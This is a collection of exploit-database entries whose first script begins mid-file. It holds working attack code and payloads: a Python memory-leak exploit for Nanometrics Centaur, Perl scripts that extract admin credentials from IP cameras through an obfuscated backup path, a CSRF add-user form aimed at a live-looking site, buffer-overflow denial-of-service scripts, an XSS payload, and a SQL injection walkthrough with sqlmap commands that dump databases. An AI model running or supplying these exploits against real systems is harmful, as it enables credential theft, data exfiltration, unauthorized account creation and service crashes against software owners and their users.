"/zsl" self.syslog = "/logs/syslog" self.buffer_pad = "A" * 70 self.buffer = None self.payload = "\xFF" self.payloads_to_send = 70 # 70 seems to be a good number before we get weird results self.body = {} self.headers = None self.syslog_data = {} self.last_line = None self.before_last_line = True def banner(self): goblin = """ NN NkllON 0;;::k000XN KxllokN 0;,:,;;;;:ldK Kdccc::oK Nx,';codddl:::dkdc:c:;lON klc:clloooooooc,.':lc;'lX x;:ooololccllc:,:ll:,:xX Kd:cllc'..';:ccclc,.x _ . ___ _ . NOoc::c:,'';:ccllc::''k \ ___ , . _/_ ___ .' \ __. \ ___ | ` , __ Nklc:clccc;.;odoollc:',xN |/ \ | ` | .' ` | .' \ |/ \ | | |' `. 0l:lollc:;:,.,ccllcc:;..cOKKX | ` | | | |----' | _ | | | ` | | | | 0c;lolc;'...',;;:::::;..:cc:,cK `___,' `---|. \__/ `.___, `.___| `._.' `___,' /\__ / / | Nc'clc;..,,,:::c:;;;,'..:oddoc;c0 \___/ Nl';;,:,.;:,;:;;;,'.....cccc:;..x InTrOdUcEs: //Nano-Bleed// XxclkXk;'::,,,''';:::;'''...'',:o0 Kl,''',:cccccc:;..';;;:cc;;dX Discovered / Created by: byteGoblin O,.,;;,;:::::;;,,;::,.';:c';K contact: bytegoblin <at> zeroscience.mk Kdcccccdl'';;..'::;;,,,;:::;,'..;:.;K d;,;;'...',,,:,..,;,',,;;,,,'.cd,':.;K Vendor: Nanometrics Inc. - nanometrics.ca Oddl',,'',:cxX0:....'',,''..;dKKl,;,,xN Product: Centaur, TitanSMA d...'ckN Xkl:,',:clll:,..,cxd;,::,,xN Affected versions: <= 4.3.23, <= 4.3.20 0:',';k Xx:,''..,cccc::c:'.';:;..,;,lK 0:'clc':o;',;,,.';loddolc;'.,cc'.;olkN CVE: N/A 0:'cdxdc,..';..,lOo,:clc:'.,:ccc;.oN Advisory: ZSL-2020-5562 / zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php :,;okxdc,..,,..lK Xkol;:x0kl;;::;':0 x:,:odo:,'.',,.'xN 0lk Nk;';:;.cN Description: Unauthenticated Remote Memory Leak in Nanometrics Centaur product Xx:,'':xk:..,''lK Y k;';;';xX XOkkko'.....'O d.';;,,:xN 0dooooooxX x'.'''',oK _.o-'( Shout-out to the bois: LiquidWorm, 0nyxd, MemeQueen, Vaakos, Haunt3r )'-o._ XOkkkkkON """ print(goblin) def generate_payload(self, amount_of_bytes): self.payload += "\x00" * amount_of_bytes self.headers = {"Cookie": self.buffer_pad, "Referer": self.payload} def read_syslog(self, initial=False): # Read syslog remotely and filter out 'HeapByteBuffer' messages. # 'initial' is used to make a 'snapshot' of the state before we send payloads... # That way we can filter on what we've just sent. print("[!] - Grabbing syslog from: {}{}".format(self.host, self.syslog)) buffer = "" r = requests.get(self.host + self.syslog) if r.status_code == 200: print("[!] - We got syslog, it is: {} bytes".format(len(r.content))) split = r.text.split("\n") for line in split: if "HeapByteBuffer" in line: if initial: self.last_line = line else: if line == self.last_line: self.before_last_line = False if not self.before_last_line: buffer_addr = re.search("\@\w+", line).group(0).strip("@") try: leak = re.search(">>>.+(?=\.\.\.)", line).group(0).strip(">>>") buffer += leak except Exception as e: print(e) if initial: return self.last_line self.buffer = buffer else: # we can't access syslog? print("[!!!] - Yoooo... we can't access syslog? Make sure you can access it, dawg...") print("[!!!] - The status code we got was: {}".format(r.status_code)) exit(-1) def show_output(self): # we need to translate '\r\n' into actual newlines if self.buffer is not None and self.buffer is not "": self.buffer = self.buffer.replace("\\n", "\n") self.buffer = self.buffer.replace("\\r", "\r") self.buffer = self.buffer.replace("%2f", "/") print("[*] BUFFER LENGTH: {}".format(len(self.buffer))) print("=" * 50) print("[*] THIS IS THE LOOT") print("=" * 50) for num, x in enumerate(self.buffer.split("\n")): print("{}.\t| \t{}".format(num, x)) def send_payload(self, amount): print("[!] - Sending payloads to target: {}{}".format(self.host, self.page)) if amount > self.payloads_to_send or amount < 0: amount = self.payloads_to_send for num, x in enumerate(range(0, amount)): if num % 10 == 0: print("[!] - [{}/{}] payloads sent...".format(num, amount)) try: self.generate_payload(17) r = requests.post(self.host + self.page, data=self.body, headers=self.headers) except Exception as e: print(e) print("[!] - [{}/{}] payloads sent...".format(amount, amount)) def parse_sys_args(self): if len(sys.argv) >= 2: self.host = sys.argv[1] if not "http" in self.host: self.host = "http://{}".format(self.host) if len(sys.argv) == 3: # amount of packets to send self.payloads_to_send = sys.argv[2] else: self.print_help() def print_help(self): print("Usage: {} <ip_addr[:port]> [amount of payloads to send]".format(sys.argv[0])) print("Example: centaur3.py 123.456.789.0:8080 200") print("\tThis will send 200 payloads to the aforementioned host") print("\tThe [port] and [amount of payloads] are optional") exit(-1) def main(self): self.parse_sys_args() self.banner() ll = self.read_syslog(initial=True) self.send_payload(70) self.read_syslog() self.show_output() if __name__ == '__main__': Goblin().main()

# Exploit Title: DBPower C300 HD Camera - Remote Configuration Disclosure # Date: 2020-02-19 # Author: Todor Donev # Vendor: https://donev.eu/ # CVE: N/A # Copyright 2020 (c) Todor Donev # # https://donev.eu/ # https://donev.eu/blog/dbpower-c300-multiple-vulnerabilities # # Disclaimer: # This or previous programs are for Educational purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages # caused by direct or indirect use of the information or functionality provided by these programs. # The author or any Internet provider bears NO responsibility for content or misuse of these programs # or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, # system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's # responsibility. # # Use them at your own risk! # # (Dont do anything without permissions) # # # [ DBPower C300 HD Camera Remote Configuration Disclosure # [ ========================================================== # [ Exploit Author: Todor Donev 2020 <[email protected]> # [ Initializing the browser # [ >> User-Agent => Seamonkey-1.1.13-1(X11; U; GNU Fedora fc 10) Gecko/20081112 # [ >> Content-Type => application/x-www-form-urlencoded # [ << Connection => close # [ << Date => # [ << Accept-Ranges => bytes # [ << Server => thttpd/2.25b 29dec2003 # [ << Content-Length => 25730 # [ << Content-Type => application/octet-stream # [ << Last-Modified => # [ << Client-Date => # [ << Client-Peer => 192.168.1.103:8080 # [ << Client-Response-Num => 1 # [ # [ Username : admin # [ Password : admin # #!/usr/bin/perl use strict; use HTTP::Request; use LWP::UserAgent; use WWW::UserAgent::Random; use Gzip::Faster 'gunzip'; my $host = shift || ''; # Full path url to the store my $cmd = shift || ''; # show - Show configuration dump $host =~ s/\/$//; print "\033[2J"; #clear the screen print "\033[0;0H"; #jump to 0,0 print "[ DBPower C300 HD Camera Remote Configuration Disclosure\n"; print "[ ==========================================================\n"; print "[ Exploit Author: Todor Donev 2020 <todor.donev\@gmail.com>\n"; if ($host !~ m/^http/){ print "[ Usage, Password Disclosure: perl $0 https://target:port/\n"; print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n"; exit; } print "[ Initializing the browser\n"; my $user_agent = rand_ua("browsers"); my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 }); $browser->timeout(30); $browser->agent($user_agent); # my $target = $host."/tmpfs/config_backup.bin"; my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69"; my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]); my $response = $browser->request($request) or die "[ Exploit Failed: $!"; print "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names; print "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names; print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200); my $gzipped = $response->content(); my $config = gunzip($gzipped); print "[ \n"; if ($cmd =~ /show/) { print "[ >> Configuration dump...\n[\n"; print "[ ", $_, "\n" for split(/\n/,$config); exit; } else { print "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/); print "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/); exit; }

# Exploit Title: Easy2Pilot 7 - Cross-Site Request Forgery (Add User) # Author: indoushka # Date: 2020-02-20 # Tested on: windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) # Vendor: http://easy2pilot-v7.com/ # CVE: N/A #poc : [+] Dorking İn Google Or Other Search Enggine. [+] save code as poc.html [+] <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://www.w3.org/2005/10/profile"> <script data-ad-client="ca-pub-6748326038387042" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> </tr> </table> <br/><br/> <form action="https://immosl.lu/admin.php?action=add_user" method="POST"> <table class="modif_utilisateur" border="0" cellpadding="3" cellspacing="0" width="350"> <tr> <td class="tah11" colspan="2" align="center"><B>Nouvel utilisateur : </B></td> </tr> <tr> <td class="tah11" align="right">Nom d'utilisateur :</td> <td class="tah11" align="left"><input type="text" name="user" class="form-control" value=""></td> </tr> <tr> <td class="tah11" align="right">Mot de passe : </td> <td class="tah11" align="left"><input type="text" name="pass" class="form-control" value=""></td> </tr> <tr> <td class="tah11" colspan="2" align="center"><input class="btn btn-lg btn-primary" type="submit" value="Ajouter"></td> </tr> </table> </form><br/><br/> <div> Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | | =======================================================================================================================================

# Exploit Title : Core FTP Lite 1.3 - Denial of Service (PoC) # Exploit Author: Berat Isler # Date: 2020-02-20 # Vendor Homepage: http://www.coreftp.com/ # Software Link Download:http://tr.oldversion.com/windows/core-ftp-le-1-3cbuild1437 # Version: Core FTP 1.3cBuild1437 # Tested on : Windows 7 32-bit # First step , Run exploit script, it will generate a new file with the name "mi.txt" # Then start Core FTP application and find the "username" textbox. # After that pate the content of "mi.txt" in to the "username" field like this --> "AAAAAAAAA" # Don't need to click anything because application is already crash. This is the code : #!/usr/bin/python b0f = "A" * 7000 payload = b0f try: f=open("mi.txt","w") print "[+] Creating %s bytes payload generated .. .. .." %len(payload) f.write(payload) f.close() print "[+] File created :) " except: print "File cannot be created :(("

# Exploit Title: Avaya IP Office Application Server 11.0.0.0 - Reflective Cross-Site Scripting # Release Date: 2019-12-11 # Exploit Authors: Dan Bohan, Scott Goodwin, OCD Tech # Vendor Homepage: https://www.avaya.com/en/ # Software Link: https://www.avaya.com/en/products/unified-communications/voip/ # Vulnerable Version: 11.0 FP4 SP1 and before # Tested on: 11.0.0.0 # CVE: CVE-2019-7004 # Vendor Advisory: ASA-2019-213 # References: https://downloads.avaya.com/css/P8/documents/101062833 # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7004 Avaya IP Office version 11.0.0.0 and before has a vulnerable login page (username) which is susceptible to cross-site scripting (XSS) via a POST request due to improper sanitization of user input. XSS via a post request allows for arbitrary code to be executed on the client’s system in the security context of the browser. By submitting a specially crafted username, it is possible to execute arbitrary JavaScript. # PoC Username: 41529%22%2F%3E%0A%3Cscript%3Ealert%28%27XSS%21%27%29%3B%3C%2Fscript%3E Password: Anything

# Exploit Title: GUnet OpenEclass E-learning platform 1.7.3 - 'uname' SQL Injection # Google Dork: intext:"© GUnet 2003-2007" # Date: 2019-11-03 # Exploit Author: emaragkos # Vendor Homepage: https://www.openeclass.org/ # Software Link: http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz # Version: 1.7.3 (2007) # Tested on: Ubuntu 12 (Apache 2.2.22, PHP 5.3.10, MySQL 5.5.38) # CVE : - # GUnet OpenEclass <= 1.7.3 E-learning platform - Unauthenticated Blind SQL Injection You can confirm applications' version by visiting https://URL/info/about.php Versions prior to 1.7.3 might also by vulnerable but were not tested. Source code: http://download.openeclass.org/files/1.7/eclass-1.7.3.zip http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz Setup instructions: http://download.openeclass.org/files/docs/1.7/Install.pdf Changelog: https://download.openeclass.org/files/docs/1.7/CHANGES.txt Manual: https://download.openeclass.org/files/docs/1.7/eClass.pdf ############################################################################ Vulnerability: Post parameter (uname) is vulnerable to time-based blind SQLi ############################################################################ Steps to reproduce: 1) Visit vulnerable webapp and confirm version is <= 1.7.3 https://URL/info/about.php 2) Configure Burp proxy to intecrept and to capture a login sequence with invalid username/password. (e.g. username:test password:test) Your request should look like this: POST / HTTP/1.1 Host: 192.168.1.8 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.8/ Content-Type: application/x-www-form-urlencoded Content-Length: 49 Connection: close Cookie: PHPSESSID=d6gupmerbr0k84st4d7qv9jsl1 Upgrade-Insecure-Requests: 1 uname=test&pass=test&submit=%C5%DF%F3%EF%E4%EF%F2 3) Save intercepted request as a file (Right click -> Copy to file -> Save as eclasstestlogin) 4) Load the file to SQLMap with the use of -r parameter sqlmap -r eclasstestlogin --level=5 --risk=3 -v SQLMap will find the following payload --- Parameter: uname (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: uname=test' AND (SELECT 5551 FROM (SELECT(SLEEP(5)))IZsi)-- aLyD&pass=test&submit=%C5%DF%F3%EF%E4%EF%F2 Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) --- 5) Exploit it! sqlmap -r eclasstestlogin -v --current-db sqlmap -r eclasstestlogin -v -D [DB-NAME-GOES-HERE] --dump sqlmap -r eclasstestlogin -v -D [DB-NAME-GOES-HERE] -T user -C password --dump 6) Bonus! Passwords are stored in plaintext

# Title: ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure # Author: Todor Donev # Date: 2020-02-23 # Vendor: www.escam.cn # Product Link: http://www.escam.cn/search/?class1=&class2=&class3=&searchtype=0&searchword=qd-900&lang=en # CVE: N/A #!/usr/bin/perl # # ESCAM QD-900 WIFI HD Camera Remote Configuration Disclosure # # Copyright 2020 (c) Todor Donev # # https://donev.eu/ # # Disclaimer: # This or previous programs are for Educational purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages # caused by direct or indirect use of the information or functionality provided by these programs. # The author or any Internet provider bears NO responsibility for content or misuse of these programs # or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, # system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's # responsibility. # # Use them at your own risk! # # (Dont do anything without permissions) # # [ ESCAM QD-900 WIFI HD Camera Remote Configuration Disclosure # [ =========================================================== # [ Exploit Author: Todor Donev 2020 <[email protected]> # [ Initializing the browser # [ >> User-Agent => Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7.5) Gecko/20050105 Epiphany/1.4.8 # [ >> Content-Type => application/x-www-form-urlencoded # [ << Connection => close # [ << Date => Fri, 21 Feb 2020 20:23:56 GMT # [ << Accept-Ranges => bytes # [ << Server => thttpd/2.25b 29dec2003 # [ << Content-Length => 25003 # [ << Content-Type => application/octet-stream # [ << Last-Modified => Fri, 21 Feb 2020 20:23:55 GMT # [ << Client-Date => Fri, 21 Feb 2020 20:23:57 GMT # [ << Client-Peer => 192.168.1.105:8000 # [ << Client-Response-Num => 1 # [ # [ Username : admin # [ Password : admin use strict; use HTTP::Request; use LWP::UserAgent; use WWW::UserAgent::Random; use Gzip::Faster 'gunzip'; my $host = shift || ''; # Full path url to the store my $cmd = shift || ''; # show - Show configuration dump $host =~ s/\/$//; print "\033[2J"; #clear the screen print "\033[0;0H"; #jump to 0,0 print "[ ESCAM QD-900 WIFI HD Camera Remote Configuration Disclosure\n"; print "[ ===========================================================\n"; print "[ Exploit Author: Todor Donev 2020 <todor.donev\@gmail.com>\n"; if ($host !~ m/^http/){ print "[ Usage, Password Disclosure: perl $0 https://target:port/\n"; print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n"; exit; } print "[ Initializing the browser\n"; my $user_agent = rand_ua("browsers"); my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 }); $browser->timeout(30); $browser->agent($user_agent); # my $target = $host."/tmpfs/config_backup.bin"; my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69"; my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]); my $response = $browser->request($request) or die "[ Exploit Failed: $!"; print "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names; print "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names; print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200); my $gzipped = $response->content(); my $config = gunzip($gzipped); print "[ \n"; if ($cmd =~ /show/) { print "[ >> Configuration dump...\n[\n"; print "[ ", $_, "\n" for split(/\n/,$config); exit; } else { print "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/); print "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/); exit; }

1

# Title : AMSS++ v 4.31 - 'id' SQL Injection # Author : indoushka # Tested on: windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) # Vendor: http://amssplus.ubn4.go.th/amssplus_download/amssplus_4_31_install.rar # Dork: แนะนำให้ใช้บราวเซอร์ Google Chrome "AMSS++" # CVE: N/A # poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use payload : /modules/mail/main/maildetail.php?id=174 [+] http://127.0.0.1/amssplus_4_31_install/amssplus/modules/mail/main/maildetail.php?id=1 <==== inject here Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | | =======================================================================================================================================

# Exploit Title: SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure # Author: Todor Donev # Date: 2020-02-23 # Vendor: https://secu.jp/ # Product Link: https://secu.jp/support/831nh1.html # CVE: N/A # # SecuSTATION IPCAM-130 HD Camera Remote Configuration Disclosure # # Copyright 2020 (c) Todor Donev # # https://donev.eu/ # # Disclaimer: # This or previous programs are for Educational purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages # caused by direct or indirect use of the information or functionality provided by these programs. # The author or any Internet provider bears NO responsibility for content or misuse of these programs # or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, # system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's # responsibility. # # Use them at your own risk! # # (Dont do anything without permissions) # # [ SecuSTATION IPCAM-130 HD Camera Remote Configuration Disclosure # [ =============================================================== # [ Exploit Author: Todor Donev 2020 <[email protected]> # [ Initializing the browser # [ >> User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko) # [ >> Content-Type => application/x-www-form-urlencoded # [ << Connection => close # [ << Date => Fri, 21 Feb 2020 21:11:37 GMT # [ << Accept-Ranges => bytes # [ << Server => thttpd/2.25b 29dec2003 # [ << Content-Length => 32333 # [ << Content-Type => application/octet-stream # [ << Last-Modified => Fri, 21 Feb 2020 21:11:36 GMT # [ << Client-Date => Fri, 21 Feb 2020 21:12:23 GMT # [ << Client-Peer => 192.168.100.200:81 # [ << Client-Response-Num => 1 # [ # [ Username : admin # [ Password : admin #!/usr/bin/perl use strict; use HTTP::Request; use LWP::UserAgent; use WWW::UserAgent::Random; use Gzip::Faster 'gunzip'; my $host = shift || ''; # Full path url to the store my $cmd = shift || ''; # show - Show configuration dump $host =~ s/\/$//; print "\033[2J"; #clear the screen print "\033[0;0H"; #jump to 0,0 print "[ SecuSTATION IPCAM-130 HD Camera Remote Configuration Disclosure\n"; print "[ ===============================================================\n"; print "[ Exploit Author: Todor Donev 2020 <todor.donev\@gmail.com>\n"; if ($host !~ m/^http/){ print "[ Usage, Password Disclosure: perl $0 https://target:port/\n"; print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n"; exit; } print "[ Initializing the browser\n"; my $user_agent = rand_ua("browsers"); my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 }); $browser->timeout(30); $browser->agent($user_agent); # my $target = $host."/tmpfs/config_backup.bin"; my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69"; my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]); my $response = $browser->request($request) or die "[ Exploit Failed: $!"; print "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names; print "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names; print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200); my $gzipped = $response->content(); my $config = gunzip($gzipped); print "[ \n"; if ($cmd =~ /show/) { print "[ >> Configuration dump...\n[\n"; print "[ ", $_, "\n" for split(/\n/,$config); exit; } else { print "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/); print "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/); exit; }

# Title: Quick N Easy Web Server 3.3.8 - Denial of Service (PoC) # Date: 2019-12-25 # Author: Cody Winkler # Vendor Homepage: https://www.pablosoftwaresolutions.com/ # Software Link: https://www.pablosoftwaresolutions.com/html/quick__n_easy_web_server.html # Version: <= 3.3.8 # Tested on: Windows 10 x64 (wow64) # CVE: N/A #!/usr/bin/env python """ Remote Unauthenticated Heap Memory Corruption in Quick N' Easy Web Server <= 3.3.8 [+] Usage: python quickwww_heap338.py <IP> <PORT> $ python exploit.py 127.0.0.1 80 """ from __future__ import print_function import socket import sys import re host = sys.argv[1] port = int(sys.argv[2]) crashed = r'(503 Service Unavailable)' http_req = "GET / HTTP/1.1\r\n" http_req += "Host: " + "A"*15000 + "\r\n" # 50000 A's causes an interesting double free in OLEAUT32!VariantClear() when attached to debugger http_req += "User-Agent: A\r\n" http_req += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" http_req += "Accept-Language: en-US,en;q=0.5\r\n" http_req += "Cookie: A\r\n" http_req += "Connection: Close\r\n" http_req += "Upgrade-Insecure-Requests: 0\r\n" http_req += "Cache-control: max-age=0\r\n\r\n" def main(): print("[+] Remote Heap Memory Corruption in Quick n Easy Web Server <= 3.3.8") i = 1 while( i < 1500): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send(http_req) print("[+] Spraying heap with %d 5000-byte requests" % i, end='\r') sys.stdout.flush() if re.search(crashed, s.recv(1024)): print(" "*50) print("[+] Threads have exited BAADF00D with %d requests!" % i) s.close() exit() s.close() i = i+1 except Exception, msg: print("[-] Something went wrong :(") print(msg) main() """ 0:010> kb7 # ChildEBP RetAddr Args to Child 00 06bbf4d4 77ebc1f5 77df50e4 8ae27015 01471640 ntdll!RtlpValidateHeapEntry+0x61114 01 06bbf51c 77e6b325 06bc0048 01471640 772e0f80 ntdll!RtlDebugSizeHeap+0xb3 02 06bbf53c 772e0f9b 013b0000 00000000 06bc0048 ntdll!RtlSizeHeap+0x45775 03 06bbf550 76640be7 773fcf44 06bc0048 00000008 combase!CRetailMalloc_GetSize+0x1b [onecore\com\combase\class\memapi.cxx @ 702] 04 06bbf574 766408cd 06bc0048 01471760 00451f4c OLEAUT32!APP_DATA::FreeCachedMem+0x37 05 06bbf5a8 0041ec27 06bbf5bc 05ec4fe4 05ec4f50 OLEAUT32!VariantClear+0x20d WARNING: Stack unwind information not available. Following frames may be wrong. 06 06bbf5c4 766408cd 76cd0008 0907a724 01471254 quickweb+0x1ec27 0:010> !analyze -v <SNIP> STACK_TEXT: 00000000 00000000 heap_corruption!quickweb.exe+0x0 SYMBOL_NAME: heap_corruption!quickweb.exe MODULE_NAME: heap_corruption IMAGE_NAME: heap_corruption STACK_COMMAND: ** Pseudo Context ** ManagedPseudo ** Value: 7ba5870 ** ; kb FAILURE_BUCKET_ID: HEAP_CORRUPTION_80000003_heap_corruption!quickweb.exe OS_VERSION: 10.0.17763.1 BUILDLAB_STR: rs5_release OSPLATFORM_TYPE: x86 OSNAME: Windows 10 FAILURE_ID_HASH: {68efeb37-77bb-f968-fc16-9a1fba88436f} """